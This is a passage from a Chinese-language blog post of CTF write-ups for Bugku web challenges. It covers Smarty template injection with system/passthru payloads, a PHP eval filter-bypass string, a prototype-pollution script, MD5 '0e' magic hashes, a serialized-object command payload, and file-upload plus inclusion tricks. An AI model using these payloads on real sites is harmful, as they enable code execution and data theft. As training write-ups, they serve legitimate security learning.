<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line">url=<span class="string">&#x27;http://114.67.246.176:15681/&#x27;</span></span><br><span class="line">session=requests.session()</span><br><span class="line">response_hand=session.get(url).headers</span><br><span class="line">de_flag=base64.b64decode(response_hand[<span class="string">&#x27;flag&#x27;</span>]).decode()</span><br><span class="line">margin=base64.b64decode(de_flag.split(<span class="string">&quot; &quot;</span>)[<span class="number">1</span>]).decode()</span><br><span class="line">data=&#123;</span><br><span class="line">	<span class="string">&#x27;margin&#x27;</span>: margin</span><br><span class="line">&#125;</span><br><span class="line">print(session.post(url,data=data).text)</span><br></pre></td></tr></table></figure>

<h3 id="聪明的-PHP"><a href="#聪明的-PHP" class="headerlink" title="聪明的 PHP"></a>聪明的 PHP</h3><p>考点：smart 模板注入+shell 命令使用</p>
<ul>
<li>还是有点懵<br><img src="/2021/04/04/bugku/php-1.jpg"><br>通过扫目录，发现了这个东西<br><img src="/2021/04/04/bugku/php-2.jpg"><br>猜测存在 ssti 注入<br>原来传参数的时候，少了个<code>?</code>,正确传参后<br><img src="/2021/04/04/bugku/php-3.jpg"></li>
<li>判断注入类型<br><img src="https://img-blog.csdnimg.cn/20210317105508459.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80OTYzMzMxMA==,size_16,color_FFFFFF,t_70"></li>
<li>经过判断后是 smart 模板注入<br><img src="/2021/04/04/bugku/php-4.jpg"></li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">常用payload</span><br><span class="line">&#123;<span class="keyword">if</span> phpinfo()&#125;&#123;/<span class="keyword">if</span>&#125;</span><br><span class="line">&#123;<span class="keyword">if</span> system(<span class="string">&#x27;ls&#x27;</span>)&#125;&#123;/<span class="keyword">if</span>&#125;</span><br><span class="line">&#123;<span class="keyword">if</span> readfile(<span class="string">&#x27;/flag&#x27;</span>)&#125;&#123;/<span class="keyword">if</span>&#125;</span><br><span class="line">&#123;<span class="keyword">if</span> show_source(<span class="string">&#x27;/flag&#x27;</span>)&#125;&#123;/<span class="keyword">if</span>&#125;</span><br><span class="line">&#123;<span class="keyword">if</span> system(<span class="string">&#x27;cat ../../../flag&#x27;</span>)&#125;&#123;/<span class="keyword">if</span>&#125;</span><br><span class="line">&#123;<span class="keyword">if</span> passthru(<span class="string">&#x27;/flag&#x27;</span>)&#125;&#123;/<span class="keyword">if</span>&#125;</span><br><span class="line"></span><br><span class="line">smarty中的&#123;<span class="keyword">if</span>&#125;标签中可以执行php语句</span><br></pre></td></tr></table></figure>

<p>passthru 没有被过滤，cat 过滤，可以使用 tac，more 等绕过<br>输入<code>&#123;if passthru(&#39;ls -l&#39;)&#125;&#123;/if&#125;</code><br><img src="/2021/04/04/bugku/php-5.jpg"><br>查看 start.sh 文件<code>&#123;if passthru(&#39;tac /_738&#39;)&#125;&#123;/if&#125;</code><br>得到 flag</p>
<h3 id="冬至红包"><a href="#冬至红包" class="headerlink" title="冬至红包"></a>冬至红包</h3><ul>
<li>代码审计绕 waf<br><img src="/2021/04/04/bugku/dong.jpg"><blockquote>
<p>参考<br><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_45290991/article/details/113920340">https://blog.csdn.net/qq_45290991/article/details/113920340</a>?</p>
</blockquote>
</li>
</ul>
<p>考点</p>
<ul>
<li>长度一致</li>
<li>绕过关键字</li>
<li>重点是这里有 eval(),所以存在任意文件读取，而不是满足这个 sha1()的判断…<br>参考 payload:<code>flag=$a=blag;$a&#123;0&#125;=f;111111111111111111111;?&gt;&lt;?=$$a;?&gt;</code></li>
</ul>
<h3 id="web23-代码审计"><a href="#web23-代码审计" class="headerlink" title="web23-代码审计"></a>web23-代码审计</h3><blockquote>
<p>参考<a target="_blank" rel="noopener" href="https://blog.csdn.net/ChaoYue_miku/article/details/114462951">https://blog.csdn.net/ChaoYue_miku/article/details/114462951</a>?</p>
</blockquote>
<ul>
<li>考点<br>主要是 preg_match()的绕过，当有<code>match</code>参数时，表示它将被填充为搜索结果。 $matches[0]将包含完整模式匹配到的文本</li>
</ul>
<h3 id="web24"><a href="#web24" class="headerlink" title="web24"></a>web24</h3><ul>
<li>有点狗 🐶 呀，居然把链接隐藏在这个凄惨的故事里面，学到了。。。。<br><img src="/2021/04/04/bugku/24-1.jpg"></li>
</ul>
<ul>
<li>访问 code.txt 文件，得到源码</li>
<li>考点：<br>MD5 比较绕过+strcmp 绕过</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">&#x27;v1&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>($_GET[<span class="string">&#x27;v2&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>($_GET[<span class="string">&#x27;v3&#x27;</span>]))&#123;</span><br><span class="line">    $v1 = $_GET[<span class="string">&#x27;v1&#x27;</span>];r</span><br><span class="line">    $v2 = $_GET[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line">    $v3 = $_GET[<span class="string">&#x27;v3&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>($v1 != $v2 &amp;&amp; md5($v1) == md5($v2))&#123;</span><br><span class="line">        <span class="keyword">if</span>(!strcmp($v3, $flag))&#123;</span><br><span class="line">            <span class="keyword">echo</span> $flag;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>strcmp 比较字符串是否相等，是区分大小写,当传入的两个参数无法比较时，返回 0，即可绕过。。</p>
<h3 id="sodirty-原型链污染"><a href="#sodirty-原型链污染" class="headerlink" title="sodirty-原型链污染"></a>sodirty-原型链污染</h3><ul>
<li>直接参考大佬脚本得到,得到 flag，原型链污染后面再补吧</li>
</ul>
<ul>
<li>先贴大佬脚本。。。。tql</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Author：dota_st</span></span><br><span class="line"><span class="comment"># Date：2021/2/5 8:36</span></span><br><span class="line"><span class="comment"># blog: www.wlhhlc.top</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&quot;http://114.67.246.176:15425&quot;</span></span><br><span class="line"></span><br><span class="line">headers = &#123;<span class="string">&#x27;Content-Type&#x27;</span>: <span class="string">&#x27;application/json&#x27;</span> &#125;</span><br><span class="line">req = requests.session()</span><br><span class="line">test = req.get(url+<span class="string">&quot;/reg&quot;</span>)</span><br><span class="line">print(test.text)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">r = req.post(url+<span class="string">&quot;/update&quot;</span>,json=&#123;<span class="string">&quot;attrkey&quot;</span>:<span class="string">&quot;__proto__.pwd22&quot;</span>,<span class="string">&quot;attrval&quot;</span>:<span class="string">&quot;pwd&quot;</span>&#125;,headers=headers)</span><br><span class="line">print(r.text)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">r = req.post(url+<span class="string">&quot;/update&quot;</span>,json=&#123;<span class="string">&quot;attrkey&quot;</span>:<span class="string">&quot;age&quot;</span>,<span class="string">&quot;attrval&quot;</span>:<span class="number">10</span>&#125;,headers=headers)</span><br><span class="line">print(r.text)</span><br><span class="line"></span><br><span class="line">r = req.post(url+<span class="string">&quot;/getflag&quot;</span>,json=&#123;<span class="string">&quot;key&quot;</span>:<span class="string">&quot;pwd22&quot;</span>,<span class="string">&quot;password&quot;</span>:<span class="string">&quot;pwd&quot;</span>&#125;,headers=headers)</span><br><span class="line">print(r.text)</span><br></pre></td></tr></table></figure>

<h3 id="web25"><a href="#web25" class="headerlink" title="web25"></a>web25</h3><ul>
<li>提示:sql 约束注入</li>
<li>在 sql 执行字符串处理时，字符串末尾的空格符将会被删除。也就是说”admin”和”admin “是相等的。例如用一下语句查询时，与使用”admin”进行查询时的结果是一样的。<br><code>SELECT * FROM users_test WHERE username=&#39;admin &#39;;</code></li>
</ul>
<h3 id="web27–md5-collision"><a href="#web27–md5-collision" class="headerlink" title="web27–md5-collision"></a>web27–md5-collision</h3><p><img src="/2021/04/04/bugku/27-1.jpg"><br>提示输入 a 操作后，返回 flase,扫后台，也没有扫到任何东西，怎么办呢？当然是—-看 wp 了</p>
<ul>
<li>题目本来是有源码的，现在就消失了</li>
<li>收藏一波</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br></pre></td><td class="code"><pre><span class="line">常用的以0e开头的md5和原值：</span><br><span class="line">s878926199a</span><br><span class="line">0e545993274517709034328855841020</span><br><span class="line">s155964671a</span><br><span class="line">0e342768416822451524974117254469</span><br><span class="line">s214587387a</span><br><span class="line">0e848240448830537924465865611904</span><br><span class="line">s214587387a</span><br><span class="line">0e848240448830537924465865611904</span><br><span class="line">s878926199a</span><br><span class="line">0e545993274517709034328855841020</span><br><span class="line">s1091221200a</span><br><span class="line">0e940624217856561557816327384675</span><br><span class="line">s1885207154a</span><br><span class="line">0e509367213418206700842008763514</span><br><span class="line">s1502113478a</span><br><span class="line">0e861580163291561247404381396064</span><br><span class="line">s1885207154a</span><br><span class="line">0e509367213418206700842008763514</span><br><span class="line">s1836677006a</span><br><span class="line">0e481036490867661113260034900752</span><br><span class="line">s155964671a</span><br><span class="line">0e342768416822451524974117254469</span><br><span class="line">s1184209335a</span><br><span class="line">0e072485820392773389523109082030</span><br><span class="line">s1665632922a</span><br><span class="line">0e731198061491163073197128363787</span><br><span class="line">s1502113478a</span><br><span class="line">0e861580163291561247404381396064</span><br><span class="line">s1836677006a</span><br><span class="line">0e481036490867661113260034900752</span><br><span class="line">s1091221200a</span><br><span class="line">0e940624217856561557816327384675</span><br><span class="line">s155964671a</span><br><span class="line">0e342768416822451524974117254469</span><br><span class="line">s1502113478a</span><br><span class="line">0e861580163291561247404381396064</span><br><span class="line">s155964671a</span><br><span class="line">0e342768416822451524974117254469</span><br><span class="line">s1665632922a</span><br><span class="line">0e731198061491163073197128363787</span><br><span class="line">s155964671a</span><br><span class="line">0e342768416822451524974117254469</span><br><span class="line">s1091221200a</span><br><span class="line">0e940624217856561557816327384675</span><br><span class="line">s1836677006a</span><br><span class="line">0e481036490867661113260034900752</span><br><span class="line">s1885207154a</span><br><span class="line">0e509367213418206700842008763514</span><br><span class="line">s532378020a</span><br><span class="line">0e220463095855511507588041205815</span><br><span class="line">s878926199a</span><br><span class="line">0e545993274517709034328855841020</span><br><span class="line">s1091221200a</span><br><span class="line">0e940624217856561557816327384675</span><br><span class="line">s214587387a</span><br><span class="line">0e848240448830537924465865611904</span><br><span class="line">s1502113478a</span><br><span class="line">0e861580163291561247404381396064</span><br><span class="line">s1091221200a</span><br><span class="line">0e940624217856561557816327384675</span><br><span class="line">s1665632922a</span><br><span class="line">0e731198061491163073197128363787</span><br><span class="line">s1885207154a</span><br><span class="line">0e509367213418206700842008763514</span><br><span class="line">s1836677006a</span><br><span class="line">0e481036490867661113260034900752</span><br><span class="line">s1665632922a</span><br><span class="line">0e731198061491163073197128363787</span><br><span class="line">s878926199a</span><br><span class="line">0e545993274517709034328855841020</span><br></pre></td></tr></table></figure>

<ul>
<li>弱密码，直接<code>0e</code>开头即可绕过<code>==</code></li>
</ul>
<h3 id="web28"><a href="#web28" class="headerlink" title="web28"></a>web28</h3><ul>
<li>代码审计绕过即可</li>
</ul>
<h3 id="安慰奖–反序列化"><a href="#安慰奖–反序列化" class="headerlink" title="安慰奖–反序列化"></a>安慰奖–反序列化</h3><ul>
<li>存在 bak 文件,下载后得到源码，发现存在序列化代码</li>
<li>payload<code>code=O:3:&quot;ctf&quot;:3:&#123;s:11:&quot;%00*%00username&quot;;s:5:&quot;admin&quot;;s:6:&quot;%00*%00cmd&quot;;s:12:&quot;tac flag.php&quot;;&#125;</code></li>
<li>注意: 1.应为原类当中是<code>protected</code>修饰，这里序列化后是没有<code>%00</code>，需要额外加，然后更改字符串的长度数字，不然会出错, 2.<code>flag.php</code>这个文件名，纯靠猜测。。。</li>
</ul>
<h3 id="web33–解密"><a href="#web33–解密" class="headerlink" title="web33–解密"></a>web33–解密</h3><ul>
<li>没有写出来，密码方面的不是特别清楚</li>
</ul>
<h3 id="web34–文件包含和文件上传"><a href="#web34–文件包含和文件上传" class="headerlink" title="web34–文件包含和文件上传"></a>web34–文件包含和文件上传</h3><ul>
<li>提示：文件包含</li>
<li>通过上传 jpeg 或其他允许的文件，然后通过文件包含访问后，就可以将此文件当做 php 文件执行。之后也可直接蚁剑访问</li>
</ul>
<h3 id="web31"><a href="#web31" class="headerlink" title="web31"></a>web31</h3><ul>
<li>后台扫到<code>robots.txt</code>,打开<code>resusl.php/</code>后，发现需要<br><img src="/2021/04/04/bugku/31.jpg"></li>
<li>输入<code>x=admin</code>即可</li>
</ul>
<h3 id="web41–PHP-字符逃逸导致的对象注入"><a href="#web41–PHP-字符逃逸导致的对象注入" class="headerlink" title="web41–PHP 字符逃逸导致的对象注入"></a>web41–PHP 字符逃逸导致的对象注入</h3><p>如图<br><img src="/2021/04/04/bugku/41.jpg"></p>
<ul>
<li>第一次见过这种类型的题目，有点陌生，别吓到了。。</li>
</ul>
<h3 id="web35"><a href="#web35" class="headerlink" title="web35"></a>web35</h3>
    </article>
    <!-- license  -->
    
        <div class="license-wrapper">
            <p>原文作者：<a href="http://example.com">JOe KKK</a>
            <p>原文链接：<a href="http://example.com/2021/04/04/bugku/">http://example.com/2021/04/04/bugku/</a>
            <p>发表日期：<a href="http://example.com/2021/04/04/bugku/">April 4th 2021, 9:06:06 pm</a>
            <p>更新日期：<a href="http://example.com/2021/04/04/bugku/">April 8th 2021, 9:46:07 pm</a>
            <p>版权声明：本文采用<a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc/4.0/">知识共享署名-非商业性使用 4.0 国际许可协议</a>进行许可</p>
        </div>
    
    <!-- paginator  -->
    <ul class="post-paginator">
        <li class="next">
            
                <div class="nextSlogan">Next Post</div>
                <a href= "/2021/04/06/CTF%E6%AF%94%E8%B5%9B/DASctf/" title= "DASctf-web 复现">
                    <div class="nextTitle">DASctf-web 复现</div>
                </a>
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href= "/2021/04/02/CTF%E6%AF%94%E8%B5%9B/2020%E8%A5%BF%E6%B9%96%E8%AE%BA%E5%89%91/" title= "2020西湖论剑-web复现">
                    <div class="prevTitle">2020西湖论剑-web复现</div>
                </a>
            
        </li>
    </ul>
    <!-- 评论插件 -->
    <!-- 来必力City版安装代码 -->

<!-- City版安装代码已完成 -->
    
    
    <!-- gitalk评论 -->

    <!-- utteranc评论 -->

    <!-- partial('_partial/comment/changyan') -->
    <!--PC版-->


    
    

    <!-- 评论 -->
</main>
            <!-- profile -->
            
        </div>
        <footer class="footer footer-unloaded">
    <!-- social  -->
    
    <div class="social">
        
    
        
            
                <a href="mailto:12345@qq.com" class="iconfont-archer email" title=email ></a>
            
        
    
        
            
                <a href="//github.com/fi3ework" class="iconfont-archer github" target="_blank" title=github></a>
            
        
    
        
            
                <span class="iconfont-archer wechat" title=wechat>
                  
                  <img class="profile-qr" src="/assets/example_qr.png" />
                </span>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    

    </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- 不蒜子  -->
    
    <div class="busuanzi-container">
    
     
    <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
    
    </div>
    
</footer>
    </div>
    <!-- toc -->
    
    <div class="toc-wrapper" style=
    







top:50vh;

    >
        <div class="toc-catalog">
            <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
        </div>
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#web12"><span class="toc-number">1.</span> <span class="toc-text">web12</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web8-%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="toc-number">2.</span> <span class="toc-text">web8-文件包含</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web9-%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="toc-number">3.</span> <span class="toc-text">web9-文件包含</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#10-%E5%A4%B4%E7%AD%89%E8%88%B1"><span class="toc-number">4.</span> <span class="toc-text">10-头等舱</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web40-git-%E6%B3%84%E9%9C%B2"><span class="toc-number">5.</span> <span class="toc-text">web40-git 泄露</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web13"><span class="toc-number">6.</span> <span class="toc-text">web13</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web14-%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="toc-number">7.</span> <span class="toc-text">web14-文件包含</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web15-%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4"><span class="toc-number">8.</span> <span class="toc-text">web15-密码爆破</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web16-%E5%A4%87%E4%BB%BD%E6%96%87%E4%BB%B6%EF%BC%8Cphp-%E7%89%B9%E6%80%A7"><span class="toc-number">9.</span> <span class="toc-text">web16-备份文件，php 特性</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#No-one-knows-regex-better-than-me"><span class="toc-number">10.</span> <span class="toc-text">No one knows regex better than me</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web20%E2%80%93cookie-%E6%AC%BA%E9%AA%97"><span class="toc-number">11.</span> <span class="toc-text">web20–cookie 欺骗</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web21"><span class="toc-number">12.</span> <span class="toc-text">web21</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web22-assert"><span class="toc-number">13.</span> <span class="toc-text">web22-assert()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web17-sql"><span class="toc-number">14.</span> <span class="toc-text">web17-sql</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web18-Python-%E8%84%9A%E6%9C%AC"><span class="toc-number">15.</span> <span class="toc-text">web18-Python 脚本</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web19-Python"><span class="toc-number">16.</span> <span class="toc-text">web19-Python</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%81%AA%E6%98%8E%E7%9A%84-PHP"><span class="toc-number">17.</span> <span class="toc-text">聪明的 PHP</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%86%AC%E8%87%B3%E7%BA%A2%E5%8C%85"><span class="toc-number">18.</span> <span class="toc-text">冬至红包</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web23-%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1"><span class="toc-number">19.</span> <span class="toc-text">web23-代码审计</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web24"><span class="toc-number">20.</span> <span class="toc-text">web24</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#sodirty-%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93"><span class="toc-number">21.</span> <span class="toc-text">sodirty-原型链污染</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web25"><span class="toc-number">22.</span> <span class="toc-text">web25</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web27%E2%80%93md5-collision"><span class="toc-number">23.</span> <span class="toc-text">web27–md5-collision</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web28"><span class="toc-number">24.</span> <span class="toc-text">web28</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%89%E6%85%B0%E5%A5%96%E2%80%93%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="toc-number">25.</span> <span class="toc-text">安慰奖–反序列化</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web33%E2%80%93%E8%A7%A3%E5%AF%86"><span class="toc-number">26.</span> <span class="toc-text">web33–解密</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web34%E2%80%93%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E5%92%8C%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0"><span class="toc-number">27.</span> <span class="toc-text">web34–文件包含和文件上传</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web31"><span class="toc-number">28.</span> <span class="toc-text">web31</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web41%E2%80%93PHP-%E5%AD%97%E7%AC%A6%E9%80%83%E9%80%B8%E5%AF%BC%E8%87%B4%E7%9A%84%E5%AF%B9%E8%B1%A1%E6%B3%A8%E5%85%A5"><span class="toc-number">29.</span> <span class="toc-text">web41–PHP 字符逃逸导致的对象注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web35"><span class="toc-number">30.</span> <span class="toc-text">web35</span></a></li></ol>
    </div>
    
    <div class="back-top iconfont-archer">&#xe639;</div>
    <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
          <div class="sidebar-panel-archives">
    <!-- 在ejs中将archive按照时间排序 -->
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 31
        </div>
        <!-- search  -->
        
    </div>
    
    <div class="post-archive">
    
    
    
    
    <div class="archive-year"> 2021 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/08</span><a class="archive-post-title" href= "/2021/04/08/ctfshow-ssrf/" >ctfshow&ctfhub-ssrf</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/06</span><a class="archive-post-title" href= "/2021/04/06/CTF%E6%AF%94%E8%B5%9B/%E7%BA%A2%E6%98%8E%E8%B0%B7%E6%9D%AF/" >红明谷-web 复现</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/06</span><a class="archive-post-title" href= "/2021/04/06/CTF%E6%AF%94%E8%B5%9B/DASctf/" >DASctf-web 复现</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/04</span><a class="archive-post-title" href= "/2021/04/04/bugku/" >bugku-web题</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/02</span><a class="archive-post-title" href= "/2021/04/02/CTF%E6%AF%94%E8%B5%9B/2020%E8%A5%BF%E6%B9%96%E8%AE%BA%E5%89%91/" >2020西湖论剑-web复现</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">03/28</span><a class="archive-post-title" href= "/2021/03/28/upload-labs/upload-labs/" >upload-labs</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">03/26</span><a class="archive-post-title" href= "/2021/03/26/xss-labs/" >xss-labs</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">03/24</span><a class="archive-post-title" href= "/2021/03/24/sql-labs/PAGE-2(Advanced%20Injections)/" >PAGE-2(Advanced Injections)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">03/24</span><a class="archive-post-title" href= "/2021/03/24/sql-labs/PAGE-1(Basic%20Challenges)/" >PAGE-1(Basic Challenges)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">03/24</span><a class="archive-post-title" href= "/2021/03/24/sql-labs/PAGE-3&4/" >PAGE-3(Stacked Challenges)--PAGE-4(Challenges)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">03/01</span><a class="archive-post-title" href= "/2021/03/01/%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/nmap/" >Nmap</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">03/01</span><a class="archive-post-title" href= "/2021/03/01/%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/netcat/" >Netcat</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">03/01</span><a class="archive-post-title" href= "/2021/03/01/%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/wireshark-tcpdump/" >wireshark-tcpdump</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">02/27</span><a class="archive-post-title" href= "/2021/02/27/dvwa/XSS-stored/" >XSS-stored</a>
        </li>
    
    
        <li class="archive-post-item">
